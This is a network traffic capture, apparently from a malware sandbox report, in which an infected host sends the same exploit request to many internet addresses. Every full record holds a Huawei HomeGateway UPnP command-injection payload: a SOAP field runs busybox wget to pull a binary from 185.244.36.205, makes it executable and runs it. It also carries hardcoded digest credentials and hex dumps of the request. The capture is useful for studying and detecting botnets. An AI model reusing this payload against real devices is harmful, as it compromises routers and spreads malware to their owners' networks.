                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1384192.168.2.1552046138.241.9.5237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399612904 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1385192.168.2.153851837.225.233.3937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399616957 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1386192.168.2.1541150157.128.146.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399616957 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1387192.168.2.1545182138.176.126.23337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399637938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1388192.168.2.1547154121.216.176.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399666071 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1389192.168.2.1554348102.236.204.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399694920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1390192.168.2.155858637.25.72.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399705887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1391192.168.2.154478694.105.249.6237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399724007 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1392192.168.2.154012845.36.68.13037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399744987 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1393192.168.2.1536722222.92.197.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399745941 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1394192.168.2.1541798186.149.61.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399760008 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
